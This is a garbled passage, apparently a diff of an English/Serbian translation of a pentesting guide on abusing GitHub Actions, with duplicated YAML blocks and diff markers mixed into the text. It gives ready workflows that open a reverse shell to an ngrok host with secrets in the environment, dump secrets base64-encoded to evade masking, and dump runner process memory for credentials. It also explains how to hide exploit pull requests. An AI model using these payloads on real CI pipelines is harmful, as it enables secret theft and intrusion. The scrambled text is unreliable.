### Izvršenje iz Kreiranja Repozitorijuma
In case members of an organization can **create new repos** and you can execute github actions, you can **create a new repo and steal the secrets set at organization level**.
U slučaju da članovi organizacije mogu **kreirati nove repozitorijume** i možete izvršavati github akcije, možete **kreirati novi repozitorijum i ukrasti tajne postavljene na nivou organizacije**.
### Execution from a New Branch
### Izvršenje iz Nove Grane
If you can **create a new branch in a repository that already contains a Github Action** configured, you can **modify** it, **upload** the content, and then **execute that action from the new branch**. This way you can **exfiltrate repository and organization level secrets** (but you need to know how they are called).
You can make the modified action executable **manually,** when a **PR is created** or when **some code is pushed** (depending on how noisy you want to be):
Ako možete **kreirati novu granu u repozitorijumu koji već sadrži konfigurisan Github Action**, možete **modifikovati** to, **otpremiti** sadržaj, a zatim **izvršiti tu akciju iz nove grane**. Na ovaj način možete **ekstrahovati tajne na nivou repozitorijuma i organizacije** (ali morate znati kako se zovu).
Možete napraviti modifikovanu akciju izvršnom **ručno,** kada se **kreira PR** ili kada se **neki kod otpremi** (u zavisnosti od toga koliko želite da budete uočljivi):
```yaml
on:
workflow_dispatch: # Launch manually
pull_request: #Run it when a PR is created to a branch
branches:
- master
push: # Run it when a push is made to a branch
branches:
- current_branch_name
workflow_dispatch: # Launch manually
pull_request: #Run it when a PR is created to a branch
branches:
- master
push: # Run it when a push is made to a branch
branches:
- current_branch_name
# Use '**' instead of a branh name to trigger the action in all the cranches
```
---
## Forked Execution
> [!NOTE]
> There are different triggers that could allow an attacker to **execute a Github Action of another repository**. If those triggerable actions are poorly configured, an attacker could be able to compromise them.
> Postoje različiti okidači koji bi mogli omogućiti napadaču da **izvrši Github akciju iz drugog repozitorijuma**. Ako su ti okidači loše konfigurisani, napadač bi mogao da ih kompromituje.
### `pull_request`
The workflow trigger **`pull_request`** will execute the workflow every time a pull request is received with some exceptions: by default if it's the **first time** you are **collaborating**, some **maintainer** will need to **approve** the **run** of the workflow:
Okidač radnog toka **`pull_request`** će izvršiti radni tok svaki put kada se primi pull request uz neke izuzetke: prema zadatku, ako je to **prvi put** da **saradjujete**, neki **održavaoc** će morati da **odobri** **izvršenje** radnog toka:
<figure><img src="../../../images/image (184).png" alt=""><figcaption></figcaption></figure>
> [!NOTE]
> As the **default limitation** is for **first-time** contributors, you could contribute **fixing a valid bug/typo** and then send **other PRs to abuse your new `pull_request` privileges**.
> Kako je **podrazumevano ograničenje** za **prvake** u doprinosima, mogli biste doprineti **ispravljanjem važeće greške/pravopisne greške** i zatim poslati **druge PR-ove da zloupotrebite svoje nove `pull_request` privilegije**.
>
> **I tested this and it doesn't work**: ~~Another option would be to create an account with the name of someone that contributed to the project and deleted his account.~~
> **Testirao sam ovo i ne radi**: ~~Druga opcija bi bila da kreirate nalog sa imenom nekoga ko je doprineo projektu i obrisao njegov nalog.~~
Moreover, by default **prevents write permissions** and **secrets access** to the target repository as mentioned in the [**docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories):
Pored toga, prema zadatku **sprečava pisane dozvole** i **pristup tajnama** ciljanom repozitorijumu kao što je pomenuto u [**dokumentaciji**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories):
> With the exception of `GITHUB_TOKEN`, **secrets are not passed to the runner** when a workflow is triggered from a **forked** repository. The **`GITHUB_TOKEN` has read-only permissions** in pull requests **from forked repositories**.
> Sa izuzetkom `GITHUB_TOKEN`, **tajne se ne prosleđuju izvršiocu** kada se radni tok pokrene iz **forkovanog** repozitorijuma. **`GITHUB_TOKEN` ima dozvole samo za čitanje** u pull request-ima **iz forkovanih repozitorijuma**.
An attacker could modify the definition of the Github Action in order to execute arbitrary things and append arbitrary actions. However, he won't be able to steal secrets or overwrite the repo because of the mentioned limitations.
Napadač bi mogao da izmeni definiciju Github akcije kako bi izvršio proizvoljne stvari i dodao proizvoljne akcije. Međutim, neće moći da ukrade tajne ili prepiše repozitorijum zbog pomenutih ograničenja.
> [!CAUTION]
> **Yes, if the attacker change in the PR the github action that will be triggered, his Github Action will be the one used and not the one from the origin repo!**
> **Da, ako napadač promeni u PR-u github akciju koja će biti pokrenuta, njegova Github akcija će biti ta koja će se koristiti, a ne ona iz originalnog repozitorijuma!**
As the attacker also controls the code being executed, even if there aren't secrets or write permissions on the `GITHUB_TOKEN` an attacker could for example **upload malicious artifacts**.
Kako napadač takođe kontrole kod koji se izvršava, čak i ako nema tajni ili pisanih dozvola na `GITHUB_TOKEN`, napadač bi mogao, na primer, **da otpremi zlonamerne artefakte**.
### **`pull_request_target`**
The workflow trigger **`pull_request_target`** have **write permission** to the target repository and **access to secrets** (and doesn't ask for permission).
Okidač radnog toka **`pull_request_target`** ima **pisane dozvole** za ciljani repozitorijum i **pristup tajnama** (i ne traži dozvolu).
Note that the workflow trigger **`pull_request_target`** **runs in the base context** and not in the one given by the PR (to **not execute untrusted code**). For more info about `pull_request_target` [**check the docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target).\
Moreover, for more info about this specific dangerous use check this [**github blog post**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/).
Napomena: okidač radnog toka **`pull_request_target`** **izvršava se u osnovnom kontekstu** i ne u onom koji daje PR (da **ne izvršava nepouzdani kod**). Za više informacija o `pull_request_target` [**proverite dokumentaciju**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target).\
Pored toga, za više informacija o ovoj specifičnoj opasnoj upotrebi proverite ovaj [**github blog post**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/).
It might look like because the **executed workflow** is the one defined in the **base** and **not in the PR** it's **secure** to use **`pull_request_target`**, but there are a **few cases were it isn't**.
Može izgledati kao da je **izvršeni radni tok** onaj definisan u **osnovi** i **ne u PR-u**, pa je **sigurno** koristiti **`pull_request_target`**, ali postoje **neki slučajevi kada to nije**.
An this one will have **access to secrets**.
A ovaj će imati **pristup tajnama**.
### `workflow_run`
The [**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) trigger allows to run a workflow from a different one when it's `completed`, `requested` or `in_progress`.
In this example, a workflow is configured to run after the separate "Run Tests" workflow completes:
Okidač [**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) omogućava pokretanje radnog toka iz drugog kada je `završen`, `tražen` ili `u toku`.
U ovom primeru, radni tok je konfiguran da se izvrši nakon što se završi odvojeni "Pokreni testove" radni tok:
```yaml
on:
workflow_run:
workflows: [Run Tests]
types:
- completed
workflow_run:
workflows: [Run Tests]
types:
- completed
```
Moreover, according to the docs: Workflow pokrenut događajem `workflow_run` može **pristupiti tajnama i pisati tokene, čak i ako prethodni workflow nije**.
Moreover, according to the docs: The workflow started by the `workflow_run` event is able to **access secrets and write tokens, even if the previous workflow was not**.
This kind of workflow could be attacked if it's **depending** on a **workflow** that can be **triggered** by an external user via **`pull_request`** or **`pull_request_target`**. A couple of vulnerable examples can be [**found this blog**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)**.** The first one consist on the **`workflow_run`** triggered workflow downloading out the attackers code: `${{ github.event.pull_request.head.sha }}`\
The second one consist on **passing** an **artifact** from the **untrusted** code to the **`workflow_run`** workflow and using the content of this artifact in a way that makes it **vulnerable to RCE**.
Ova vrsta workflow-a može biti napadnuta ako **zavisi** od **workflow-a** koji može biti **pokrenut** od strane spoljnog korisnika putem **`pull_request`** ili **`pull_request_target`**. Nekoliko ranjivih primera može se [**pronaći u ovom blogu**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)**.** Prvi se sastoji od **`workflow_run`** pokrenutog workflow-a koji preuzima napadačev kod: `${{ github.event.pull_request.head.sha }}`\
Drugi se sastoji od **prosleđivanja** **artifact-a** iz **nepouzdanog** koda u **`workflow_run`** workflow i korišćenja sadržaja ovog artifact-a na način koji ga čini **ranjivim na RCE**.
### `workflow_call`
TODO
TODO: Check if when executed from a pull_request the used/downloaded code if the one from the origin or from the forked PR
TODO: Proveriti da li kada se izvršava iz pull_request-a korišćeni/preuzeti kod dolazi iz originala ili iz forkovanog PR-a
## Abusing Forked Execution
## Zloupotreba Forkovane Izvršavanja
We have mentioned all the ways an external attacker could manage to make a github workflow to execute, now let's take a look about how this executions, if bad configured, could be abused:
Pomenuli smo sve načine na koje spoljašnji napadač može uspeti da pokrene github workflow, sada hajde da pogledamo kako ove izvršavanja, ako su loše konfigurisane, mogu biti zloupotrebljene:
### Untrusted checkout execution
### Nepouzdan checkout izvršavanje
In the case of **`pull_request`,** the workflow is going to be executed in the **context of the PR** (so it'll execute the **malicious PRs code**), but someone needs to **authorize it first** and it will run with some [limitations](./#pull_request).
U slučaju **`pull_request`,** workflow će biti izvršen u **kontekstu PR-a** (tako da će izvršiti **maliciozni kod PR-a**), ali neko mora prvo da **autorizuje** i biće izvršen sa nekim [ograničenjima](./#pull_request).
In case of a workflow using **`pull_request_target` or `workflow_run`** that depends on a workflow that can be triggered from **`pull_request_target` or `pull_request`** the code from the original repo will be executed, so the **attacker cannot control the executed code**.
U slučaju workflow-a koji koristi **`pull_request_target` ili `workflow_run`** koji zavisi od workflow-a koji može biti pokrenut iz **`pull_request_target` ili `pull_request`**, kod iz originalnog repozitorijuma će biti izvršen, tako da **napadač ne može kontrolisati izvršeni kod**.
> [!CAUTION]
> However, if the **action** has an **explicit PR checkou**t that will **get the code from the PR** (and not from base), it will use the attackers controlled code. For example (check line 12 where the PR code is downloaded):
> Međutim, ako **akcija** ima **eksplicitni PR checkout** koji će **uzeti kod iz PR-a** (a ne iz osnove), koristiće napadačev kontrolisani kod. Na primer (proverite liniju 12 gde se preuzima kod PR-a):
<pre class="language-yaml"><code class="lang-yaml"># INSECURE. Provided as an example only.
<pre class="language-yaml"><code class="lang-yaml"># INSECURE. Pruženo samo kao primer.
on:
pull_request_target
pull_request_target
jobs:
build:
name: Build and test
runs-on: ubuntu-latest
steps:
build:
name: Build and test
runs-on: ubuntu-latest
steps:
<strong> - uses: actions/checkout@v2
</strong><strong> with:
</strong><strong> ref: ${{ github.event.pull_request.head.sha }}
</strong>
- uses: actions/setup-node@v1
- run: |
npm install
npm build
- uses: actions/setup-node@v1
- run: |
npm install
npm build
- uses: completely/fakeaction@v2
with:
arg1: ${{ secrets.supersecret }}
- uses: completely/fakeaction@v2
with:
arg1: ${{ secrets.supersecret }}
- uses: fakerepo/comment-on-pr@v1
with:
message: |
Thank you!
- uses: fakerepo/comment-on-pr@v1
with:
message: |
Hvala!
</code></pre>
The potentially **untrusted code is being run during `npm install` or `npm build`** as the build scripts and referenced **packages are controlled by the author of the PR**.
Potencijalno **nepouzdan kod se izvršava tokom `npm install` ili `npm build`** jer su skripte za izgradnju i referencirane **pakete pod kontrolom autora PR-a**.
> [!WARNING]
> A github dork to search for vulnerable actions is: `event.pull_request pull_request_target extension:yml` however, there are different ways to configure the jobs to be executed securely even if the action is configured insecurely (like using conditionals about who is the actor generating the PR).
> Github dork za pretragu ranjivih akcija je: `event.pull_request pull_request_target extension:yml` međutim, postoje različiti načini za konfiguraciju poslova da se izvršavaju sigurno čak i ako je akcija konfigurisana nesigurno (kao što je korišćenje uslovnih izraza o tome ko je akter koji generiše PR).
### Context Script Injections <a href="#understanding-the-risk-of-script-injections" id="understanding-the-risk-of-script-injections"></a>
### Kontekst Injekcije Skripti <a href="#understanding-the-risk-of-script-injections" id="understanding-the-risk-of-script-injections"></a>
Note that there are certain [**github contexts**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) whose values are **controlled** by the **user** creating the PR. If the github action is using that **data to execute anything**, it could lead to **arbitrary code execution:**
Napomena da postoje određeni [**github konteksti**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) čije vrednosti su **kontrolisane** od strane **korisnika** koji kreira PR. Ako github akcija koristi te **podatke za izvršavanje bilo čega**, to može dovesti do **izvršavanja proizvoljnog koda:**
{{#ref}}
gh-actions-context-script-injections.md
{{#endref}}
### **GITHUB_ENV Script Injection** <a href="#what-is-usdgithub_env" id="what-is-usdgithub_env"></a>
### **GITHUB_ENV Injekcija Skripti** <a href="#what-is-usdgithub_env" id="what-is-usdgithub_env"></a>
From the docs: You can make an **environment variable available to any subsequent steps** in a workflow job by defining or updating the environment variable and writing this to the **`GITHUB_ENV`** environment file.
Iz dokumenata: Možete učiniti **promenljivu okruženja dostupnom za sve naredne korake** u workflow poslu tako što ćete definisati ili ažurirati promenljivu okruženja i napisati to u **`GITHUB_ENV`** datoteku okruženja.
If an attacker could **inject any value** inside this **env** variable, he could inject env variables that could execute code in following steps such as **LD_PRELOAD** or **NODE_OPTIONS**.
Ako bi napadač mogao **ubaciti bilo koju vrednost** unutar ove **env** promenljive, mogao bi ubaciti env promenljive koje bi mogle izvršiti kod u narednim koracima kao što su **LD_PRELOAD** ili **NODE_OPTIONS**.
For example ([**this**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) and [**this**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)), imagine a workflow that is trusting an uploaded artifact to store its content inside **`GITHUB_ENV`** env variable. An attacker could upload something like this to compromise it:
Na primer ([**ovo**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) i [**ovo**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)), zamislite workflow koji veruje da je učitani artifact da čuva svoj sadržaj unutar **`GITHUB_ENV`** env promenljive. Napadač bi mogao da učita nešto poput ovoga da bi ga kompromitovao:
<figure><img src="../../../images/image (261).png" alt=""><figcaption></figcaption></figure>
### Vulnerable Third Party Github Actions
### Ranjive Treće Strane Github Akcije
#### [dawidd6/action-download-artifact](https://github.com/dawidd6/action-download-artifact)
As mentioned in [**this blog post**](https://www.legitsecurity.com/blog/github-actions-that-open-the-door-to-cicd-pipeline-attacks), this Github Action allows to access artifacts from different workflows and even repositories.
Kao što je pomenuto u [**ovom blog postu**](https://www.legitsecurity.com/blog/github-actions-that-open-the-door-to-cicd-pipeline-attacks), ova Github Akcija omogućava pristup artifact-ima iz različitih workflow-a i čak repozitorijuma.
The thing problem is that if the **`path`** parameter isn't set, the artifact is extracted in the current directory and it can override files that could be later used or even executed in the workflow. Therefore, if the Artifact is vulnerable, an attacker could abuse this to compromise other workflows trusting the Artifact.
Example of vulnerable workflow:
Problem je u tome što ako **`path`** parametar nije postavljen, artifact se ekstrahuje u trenutni direktorijum i može prepisati datoteke koje bi kasnije mogle biti korišćene ili čak izvršene u workflow-u. Stoga, ako je Artifact ranjiv, napadač bi mogao da zloupotrebi ovo da kompromituje druge workflow-e koji veruju Artifact-u.
Primer ranjivog workflow-a:
```yaml
on:
workflow_run:
workflows: ["some workflow"]
types:
- completed
workflow_run:
workflows: ["some workflow"]
types:
- completed
jobs:
success:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: download artifact
uses: dawidd6/action-download-artifact
with:
workflow: ${{ github.event.workflow_run.workflow_id }}
name: artifact
- run: python ./script.py
with:
name: artifact
path: ./script.py
success:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: download artifact
uses: dawidd6/action-download-artifact
with:
workflow: ${{ github.event.workflow_run.workflow_id }}
name: artifact
- run: python ./script.py
with:
name: artifact
path: ./script.py
```
This could be attacked with this workflow:
Ovo bi moglo biti napadnuto ovim radnim tokom:
```yaml
name: "some workflow"
on: pull_request
jobs:
upload:
runs-on: ubuntu-latest
steps:
- run: echo "print('exploited')" > ./script.py
- uses actions/upload-artifact@v2
with:
name: artifact
path: ./script.py
upload:
runs-on: ubuntu-latest
steps:
- run: echo "print('exploited')" > ./script.py
- uses actions/upload-artifact@v2
with:
name: artifact
path: ./script.py
```
---
## Other External Access
## Drugi Spoljni Pristup
### Deleted Namespace Repo Hijacking
### Otimanje Izbrisanog Namespace Repozitorijuma
If an account changes it's name another user could register an account with that name after some time. If a repository had **less than 100 stars previously to the change of nam**e, Github will allow the new register user with the same name to create a **repository with the same name** as the one deleted.
Ako nalog promeni svoje ime, drugi korisnik bi mogao da registruje nalog sa tim imenom nakon nekog vremena. Ako je repozitorijum imao **manje od 100 zvezdica pre promene imena**, Github će omogućiti novom registrovanom korisniku sa istim imenom da kreira **repozitorijum sa istim imenom** kao onaj koji je izbrisan.
> [!CAUTION]
> So if an action is using a repo from a non-existent account, it's still possible that an attacker could create that account and compromise the action.
> Dakle, ako neka akcija koristi repozitorijum sa nepostojećeg naloga, još uvek je moguće da napadač može da kreira taj nalog i kompromituje akciju.
If other repositories where using **dependencies from this user repos**, an attacker will be able to hijack them Here you have a more complete explanation: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/)
Ako su drugi repozitorijumi koristili **zavisnosti iz ovih korisničkih repozitorijuma**, napadač će moći da ih otme. Ovde imate potpunije objašnjenje: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/)
---
## Repo Pivoting
> [!NOTE]
> In this section we will talk about techniques that would allow to **pivot from one repo to another** supposing we have some kind of access on the first one (check the previous section).
> U ovom odeljku ćemo govoriti o tehnikama koje bi omogućile **pivotiranje sa jednog repozitorijuma na drugi**, pod pretpostavkom da imamo neku vrstu pristupa prvom (proverite prethodni odeljak).
### Cache Poisoning
### Trovanje Kešom
A cache is maintained between **wokflow runs in the same branch**. Which means that if an attacker **compromise** a **package** that is then stored in the cache and **downloaded** and executed by a **more privileged** workflow he will be able to **compromise** also that workflow.
Keš se održava između **izvršavanja radnih tokova u istoj grani**. Što znači da ako napadač **kompromituje** **paket** koji se zatim čuva u kešu i **preuzima** i izvršava ga **privilegovaniji** radni tok, on će moći da **kompromituje** i taj radni tok.
{{#ref}}
gh-actions-cache-poisoning.md
{{#endref}}
### Artifact Poisoning
### Trovanje Artefaktima
Workflows could use **artifacts from other workflows and even repos**, if an attacker manages to **compromise** the Github Action that **uploads an artifact** that is later used by another workflow he could **compromise the other workflows**:
Radni tokovi mogu koristiti **artefakte iz drugih radnih tokova i čak repozitorijuma**, ako napadač uspe da **kompromituje** Github Akciju koja **otprema artefakt** koji se kasnije koristi od strane drugog radnog toka, on bi mogao da **kompromituje druge radne tokove**:
{{#ref}}
gh-actions-artifact-poisoning.md
@@ -394,11 +376,11 @@ gh-actions-artifact-poisoning.md
---
## Post Exploitation from an Action
## Post Eksploatacija iz Akcije
### Accessing AWS and GCP via OIDC
### Pristupanje AWS i GCP putem OIDC
Check the following pages:
Proverite sledeće stranice:
{{#ref}}
../../../pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
@@ -408,170 +390,160 @@ Check the following pages:
../../../pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md
{{#endref}}
### Accessing secrets <a href="#accessing-secrets" id="accessing-secrets"></a>
### Pristupanje tajnama <a href="#accessing-secrets" id="accessing-secrets"></a>
If you are injecting content into a script it's interesting to know how you can access secrets:
Ako ubacujete sadržaj u skriptu, zanimljivo je znati kako možete pristupiti tajnama:
- If the secret or token is set to an **environment variable**, it can be directly accessed through the environment using **`printenv`**.
- Ako je tajna ili token postavljen na **promenljivu okruženja**, može se direktno pristupiti kroz okruženje koristeći **`printenv`**.
<details>
<summary>List secrets in Github Action output</summary>
<summary>Lista tajni u izlazu Github Akcije</summary>
```yaml
name: list_env
on:
workflow_dispatch: # Launch manually
pull_request: #Run it when a PR is created to a branch
branches:
- '**'
push: # Run it when a push is made to a branch
branches:
- '**'
workflow_dispatch: # Launch manually
pull_request: #Run it when a PR is created to a branch
branches:
- '**'
push: # Run it when a push is made to a branch
branches:
- '**'
jobs:
List_env:
runs-on: ubuntu-latest
steps:
- name: List Env
# Need to base64 encode or github will change the secret value for "***"
run: sh -c 'env | grep "secret_" | base64 -w0'
env:
secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
List_env:
runs-on: ubuntu-latest
steps:
- name: List Env
# Need to base64 encode or github will change the secret value for "***"
run: sh -c 'env | grep "secret_" | base64 -w0'
env:
secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
```
</details>
<details>
<summary>Get reverse shell with secrets</summary>
<summary>Dobijanje reverzne ljuske sa tajnama</summary>
```yaml
name: revshell
on:
workflow_dispatch: # Launch manually
pull_request: #Run it when a PR is created to a branch
branches:
- "**"
push: # Run it when a push is made to a branch
branches:
- "**"
workflow_dispatch: # Launch manually
pull_request: #Run it when a PR is created to a branch
branches:
- "**"
push: # Run it when a push is made to a branch
branches:
- "**"
jobs:
create_pull_request:
runs-on: ubuntu-latest
steps:
- name: Get Rev Shell
run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
env:
secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
create_pull_request:
runs-on: ubuntu-latest
steps:
- name: Get Rev Shell
run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
env:
secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
```
</details>
- If the secret is used **directly in an expression**, the generated shell script is stored **on-disk** and is accessible.
- ```bash
cat /home/runner/work/_temp/*
```
- For a JavaScript actions the secrets and sent through environment variables
- ```bash
ps axe | grep node
```
- For a **custom action**, the risk can vary depending on how a program is using the secret it obtained from the **argument**:
- Ako se tajna koristi **direktno u izrazu**, generisani shell skript se čuva **na disku** i može se pristupiti.
- ```bash
cat /home/runner/work/_temp/*
```
- Za JavaScript akcije, tajne se šalju kroz promenljive okruženja.
- ```bash
ps axe | grep node
```
- Za **prilagođenu akciju**, rizik može varirati u zavisnosti od toga kako program koristi tajnu koju je dobio iz **argumenta**:
```yaml
uses: fakeaction/publish@v3
with:
key: ${{ secrets.PUBLISH_KEY }}
```
```yaml
uses: fakeaction/publish@v3
with:
key: ${{ secrets.PUBLISH_KEY }}
```
### Abusing Self-hosted runners
### Zloupotreba samostalno hostovanih izvršilaca
The way to find which **Github Actions are being executed in non-github infrastructure** is to search for **`runs-on: self-hosted`** in the Github Action configuration yaml.
Način da se pronađe koje **Github Actions se izvršavaju u ne-github infrastrukturi** je pretraga za **`runs-on: self-hosted`** u konfiguraciji yaml za Github Action.
**Self-hosted** runners might have access to **extra sensitive information**, to other **network systems** (vulnerable endpoints in the network? metadata service?) or, even if it's isolated and destroyed, **more than one action might be run at the same time** and the malicious one could **steal the secrets** of the other one.
In self-hosted runners it's also possible to obtain the **secrets from the \_Runner.Listener**\_\*\* process\*\* which will contain all the secrets of the workflows at any step by dumping its memory:
**Samostalno hostovani** izvršioci mogu imati pristup **dodatnim osetljivim informacijama**, drugim **mrežnim sistemima** (ranjivi krajnji tački u mreži? servis za metapodatke?) ili, čak i ako je izolovan i uništen, **više od jedne akcije može biti pokrenuto u isto vreme** i zlonamerna može **ukrasti tajne** druge.
U samostalno hostovanim izvršiocima takođe je moguće dobiti **tajne iz \_Runner.Listener**\_\*\* procesa\*\* koji će sadržati sve tajne radnih tokova u bilo kojoj fazi dumpovanjem njegove memorije:
```bash
sudo apt-get install -y gdb
sudo gcore -o k.dump "$(ps ax | grep 'Runner.Listener' | head -n 1 | awk '{ print $1 }')"
```
Check [**this post for more information**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/).
Proverite [**ovaj post za više informacija**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/).
### Github Docker Images Registry
It's possible to make Github actions that will **build and store a Docker image inside Github**.\
An example can be find in the following expandable:
Moguće je napraviti Github akcije koje će **izgraditi i sačuvati Docker sliku unutar Github-a**.\
Primer se može naći u sledećem proširivom:
<details>
<summary>Github Action Build &#x26; Push Docker Image</summary>
```yaml
[...]
- name: Set up Docker Buildx
uses: docker/setup-buildx-action@v1
uses: docker/setup-buildx-action@v1
- name: Login to GitHub Container Registry
uses: docker/login-action@v1
with:
registry: ghcr.io
username: ${{ github.repository_owner }}
password: ${{ secrets.ACTIONS_TOKEN }}
uses: docker/login-action@v1
with:
registry: ghcr.io
username: ${{ github.repository_owner }}
password: ${{ secrets.ACTIONS_TOKEN }}
- name: Add Github Token to Dockerfile to be able to download code
run: |
sed -i -e 's/TOKEN=##VALUE##/TOKEN=${{ secrets.ACTIONS_TOKEN }}/g' Dockerfile
run: |
sed -i -e 's/TOKEN=##VALUE##/TOKEN=${{ secrets.ACTIONS_TOKEN }}/g' Dockerfile
- name: Build and push
uses: docker/build-push-action@v2
with:
context: .
push: true
tags: |
ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:latest
ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:${{ env.GITHUB_NEWXREF }}-${{ github.sha }}
uses: docker/build-push-action@v2
with:
context: .
push: true
tags: |
ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:latest
ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:${{ env.GITHUB_NEWXREF }}-${{ github.sha }}
[...]
```
</details>
As you could see in the previous code, the Github registry is hosted in **`ghcr.io`**.
A user with read permissions over the repo will then be able to download the Docker Image using a personal access token:
Kao što ste mogli videti u prethodnom kodu, Github registry je hostovan na **`ghcr.io`**.
Korisnik sa pravima čitanja nad repozitorijumom će moći da preuzme Docker sliku koristeći lični pristupni token:
```bash
echo $gh_token | docker login ghcr.io -u <username> --password-stdin
docker pull ghcr.io/<org-name>/<repo_name>:<tag>
```
Then, the user could search for **leaked secrets in the Docker image layers:**
{{#ref}}
https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics
{{#endref}}
### Sensitive info in Github Actions logs
### Osetljive informacije u Github Actions logovima
Even if **Github** try to **detect secret values** in the actions logs and **avoid showing** them, **other sensitive data** that could have been generated in the execution of the action won't be hidden. For example a JWT signed with a secret value won't be hidden unless it's [specifically configured](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret).
Čak i ako **Github** pokušava da **otkrije tajne vrednosti** u logovima akcija i **izbegne da ih prikaže**, **dati osetljivi podaci** koji su mogli biti generisani tokom izvršenja akcije neće biti sakriveni. Na primer, JWT potpisan tajnom vrednošću neće biti sakriven osim ako nije [specifično konfigurisano](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret).
## Covering your Tracks
## Sakrivanje tragova
(Technique from [**here**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit)) First of all, any PR raised is clearly visible to the public in Github and to the target GitHub account. In GitHub by default, we **cant delete a PR of the internet**, but there is a twist. For Github accounts that are **suspended** by Github, all of their **PRs are automatically deleted** and removed from the internet. So in order to hide your activity you need to either get your **GitHub account suspended or get your account flagged**. This would **hide all your activities** on GitHub from the internet (basically remove all your exploit PR)
(Teknika iz [**ovde**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit)) Prvo, svaki PR koji je podnet je jasno vidljiv javnosti na Github-u i ciljanom GitHub nalogu. Na GitHub-u po defaultu, **ne možemo obrisati PR sa interneta**, ali postoji obrt. Za GitHub naloge koji su **suspendovani** od strane GitHub-a, svi njihovi **PR-ovi se automatski brišu** i uklanjaju sa interneta. Dakle, da biste sakrili svoju aktivnost, potrebno je da ili dobijete **suspendovan GitHub nalog ili da vam nalog bude označen**. Ovo bi **sakrilo sve vaše aktivnosti** na GitHub-u sa interneta (u suštini uklonilo sve vaše exploit PR-ove)
An organization in GitHub is very proactive in reporting accounts to GitHub. All you need to do is share “some stuff” in Issue and they will make sure your account is suspended in 12 hours :p and there you have, made your exploit invisible on github.
Organizacija na GitHub-u je veoma proaktivna u izveštavanju naloga GitHub-u. Sve što treba da uradite je da podelite "neke stvari" u Issue i oni će se pobrinuti da vaš nalog bude suspendovan za 12 sati :p i eto, učinili ste svoj exploit nevidljivim na github-u.
> [!WARNING]
> The only way for an organization to figure out they have been targeted is to check GitHub logs from SIEM since from GitHub UI the PR would be removed.
> Jedini način na koji organizacija može da sazna da su bili meta je da proveri GitHub logove iz SIEM-a, jer bi iz GitHub UI PR bio uklonjen.
## Tools
## Alati
The following tools are useful to find Github Action workflows and even find vulnerable ones:
Sledeći alati su korisni za pronalaženje Github Action radnih tokova i čak pronalaženje ranjivih:
- [https://github.com/CycodeLabs/raven](https://github.com/CycodeLabs/raven)
- [https://github.com/praetorian-inc/gato](https://github.com/praetorian-inc/gato)
@@ -579,7 +551,3 @@ The following tools are useful to find Github Action workflows and even find vul
- [https://github.com/carlospolop/PurplePanda](https://github.com/carlospolop/PurplePanda)
{{#include ../../../banners/hacktricks-training.md}}

7
src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
View File

@@ -1,6 +1 @@
# Gh Actions - Artifact Poisoning
# Gh Actions - Zagađenje Artefakata

5
src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
View File

@@ -1,6 +1 @@
# GH Actions - Cache Poisoning

7
src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
View File

@@ -1,6 +1 @@
# Gh Actions - Context Script Injections
# Gh Actions - Kontekstualne Injekcije Skripti

49
src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
View File

@@ -2,59 +2,42 @@
{{#include ../../banners/hacktricks-training.md}}
